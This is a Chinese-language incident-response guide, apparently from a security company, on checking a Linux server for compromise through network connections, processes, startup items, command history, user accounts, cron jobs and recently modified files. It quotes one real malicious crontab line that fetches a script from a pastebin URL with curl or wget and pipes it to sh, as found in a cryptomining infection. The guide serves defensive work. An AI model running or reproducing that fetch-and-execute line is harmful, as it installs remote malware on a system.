域名預(yù)訂/競(jìng)價(jià)，好“米”不錯(cuò)過(guò)

很多客戶(hù)網(wǎng)站服務(wù)器被入侵，被攻擊，找到我們SINE安全公司尋求技術(shù)支持與幫助，有些網(wǎng)站被篡改，被跳轉(zhuǎn)，首頁(yè)內(nèi)容被替換，服務(wù)器植入木馬后門(mén)，服務(wù)器卡頓，服務(wù)器異常網(wǎng)絡(luò)連接，有的客戶(hù)使用的是阿里云服務(wù)器，經(jīng)常被提醒服務(wù)器有挖礦程序，以及網(wǎng)站被上傳webshell的安全提醒，包括騰訊云提示服務(wù)器有木馬文件，客戶(hù)網(wǎng)站被攻擊的第一時(shí)間，是需要立即處理的，降損失降到最低，讓網(wǎng)站恢復(fù)正常的訪問(wèn)，由于每個(gè)客戶(hù)找到我們SINE安全都是比較著急的，安全的處理時(shí)間也需要盡快的處理，根據(jù)我們的處理經(jīng)驗(yàn)，我們總結(jié)了一些服務(wù)器被攻擊，被黑的排查辦法，專(zhuān)門(mén)用來(lái)檢查服務(wù)器第一時(shí)間的安全問(wèn)題，看發(fā)生在哪里，服務(wù)器是否被黑，是否被攻擊，那些被篡改等等。

如何排查服務(wù)器被攻擊？

首先我們會(huì)對(duì)當(dāng)前服務(wù)器的IP，以及IP的地址，linux服務(wù)器名稱(chēng)，服務(wù)器的版本是centos,還是redhat，服務(wù)器的當(dāng)前時(shí)間，進(jìn)行收集并記錄到一個(gè)txt文檔里，接下來(lái)再執(zhí)行下一步，對(duì)當(dāng)前服務(wù)器的異常網(wǎng)絡(luò)連接以及異常的系統(tǒng)進(jìn)程檢查，主要是通過(guò)netstat -an以及-antp命令來(lái)檢查服務(wù)器存在哪些異常的IP連接。并對(duì)連接的IP，進(jìn)行歸屬地查詢(xún)，如果是國(guó)外的IP，直接記錄當(dāng)前進(jìn)程的PID值，并自動(dòng)將PID的所有信息記錄，查詢(xún)PID所在的linux文件地址，緊接著檢查當(dāng)前占用CPU大于百分之30的進(jìn)程，并檢查該進(jìn)程所在的文件夾。

在我們處理客戶(hù)服務(wù)器被攻擊的時(shí)候發(fā)現(xiàn)很多服務(wù)器的命令被篡改，比如正常的PS查看進(jìn)程的，查詢(xún)目錄的 cd的命令都給篡改了，讓服務(wù)器無(wú)法正常使用命令，檢查服務(wù)器安全造成了困擾。對(duì)服務(wù)器的啟動(dòng)項(xiàng)進(jìn)行檢查，有些服務(wù)器被植入木馬后門(mén)，即使重啟服務(wù)器也還是被攻擊，木馬會(huì)自動(dòng)的啟動(dòng)，檢查linux的init.d的文件夾里是否有多余的啟動(dòng)文件，也可以檢查時(shí)間，來(lái)判斷啟動(dòng)項(xiàng)是否有問(wèn)題。

再一個(gè)要檢查的地方是服務(wù)器的歷史命令，history很多服務(wù)器被黑都會(huì)留下痕跡，比如SSH登錄服務(wù)器后，攻擊者對(duì)服務(wù)器進(jìn)行了操作，執(zhí)行了那些惡意命令都可以通過(guò)history查詢(xún)的到，有沒(méi)有使用wget命令下載木馬，或者執(zhí)行SH文件。檢查服務(wù)器的所有賬號(hào)，以及當(dāng)前使用并登錄的管理員賬戶(hù)，tty是本地用戶(hù)登錄，pst是遠(yuǎn)程連接的用戶(hù)登錄，來(lái)排查服務(wù)器是否被黑，被攻擊，也可以檢查login.defs文件的uid值，判斷uid的passwd來(lái)獲取最近新建的管理員賬戶(hù)。執(zhí)行cat etc/passwd命令檢查是否存在異常的用戶(hù)賬戶(hù)，包括特權(quán)賬戶(hù)，UID值為0.

最重要的是檢查服務(wù)器的定時(shí)任務(wù)，前段時(shí)間某網(wǎng)站客戶(hù)中了挖礦病毒，一直占用CPU，查看了定時(shí)任務(wù)發(fā)現(xiàn)每15分鐘自動(dòng)執(zhí)行下載命令，crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代碼如上，自動(dòng)下載并執(zhí)行SH木馬文件。定時(shí)任務(wù)刪都刪不掉，最后通過(guò)檢查系統(tǒng)文件查到了木馬，并終止進(jìn)程，強(qiáng)制刪除。有些服務(wù)器被黑后，請(qǐng)立即檢查2天里被修改的文件，可以通過(guò)find命令去檢查所有的文件，看是否有木馬后門(mén)文件，如果有可以確定服務(wù)器被黑了。

以上就是服務(wù)器被入侵攻擊的檢查辦法，通過(guò)我們SINE安全給出的檢查步驟，挨個(gè)去檢查，就會(huì)發(fā)現(xiàn)出問(wèn)題，最重要的是要檢查日志，對(duì)這些日志要仔細(xì)的檢查，哪怕一個(gè)特征都會(huì)導(dǎo)致服務(wù)器陷入被黑，被攻擊的狀態(tài)，也希望我們的分享能夠幫助到更多需要幫助的人，服務(wù)器安全了，帶來(lái)的也是整個(gè)互聯(lián)網(wǎng)的安全。

申請(qǐng)創(chuàng)業(yè)報(bào)道，分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處，共同探討創(chuàng)業(yè)新機(jī)遇！